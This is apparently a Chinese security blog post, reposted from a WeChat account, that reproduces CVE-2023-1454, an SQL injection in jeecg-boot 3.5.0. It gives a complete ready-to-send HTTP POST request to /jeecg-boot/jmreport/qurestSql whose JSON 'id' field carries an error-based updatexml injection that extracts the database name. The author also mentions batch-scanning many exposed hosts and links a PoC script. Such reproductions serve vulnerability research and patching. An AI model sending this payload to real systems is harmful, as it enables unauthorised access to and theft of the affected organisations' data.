漏洞简述
jeecg-boot3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
漏洞影响
jeecg-boot
3
.5
.0
版本
项目GitHub地址:https:
//github.com/zhangdaiscott/jeecg-boot
环境搭建参考:https:
//blog.csdn.net/qq_27536045/article/details/129944987
漏洞复现
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}
写个脚本批量跑一下发现还是特多的,嗯~很“刑”。
顺便更新到 Nuclei 插件里面去。
获取 POC
获取POC脚本
https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln
End
原文始发于微信公众号(贝雷帽SEC):【漏洞复现】Jeecg-Boot- CVE-2023-1454(POC)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论